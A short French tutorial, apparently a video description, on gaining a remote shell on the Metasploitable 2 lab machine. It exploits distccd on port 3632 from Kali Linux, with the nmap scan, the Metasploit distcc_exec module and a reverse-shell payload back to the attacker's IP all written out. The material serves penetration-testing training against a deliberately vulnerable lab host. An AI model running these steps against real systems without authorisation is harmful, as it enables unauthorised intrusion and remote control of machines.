
Dans cette vidéo, on montre comment obtenir un shell distant via Kali Linux en exploitant la vulnérabilité du service distccd sur le système Metasploitable 2.
nmap -sV -p 3632 192.168.56.102
✅ Le résultat sera :
3632/tcp open distccd v1
👉 Donc distcc est ouvert et peut être exploité.
msfconsole
use exploit/unix/misc/distcc_exec
show options
Paramètres requis :
Option Valeur
RHOSTS Adresse IP de Metasploitable RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — votre adresse IP Kali Linux
run
🎉 Résultat
Si cela réussit :
[*] Command shell session opened
Nous vérifions le shell :
whoami
uname -a
id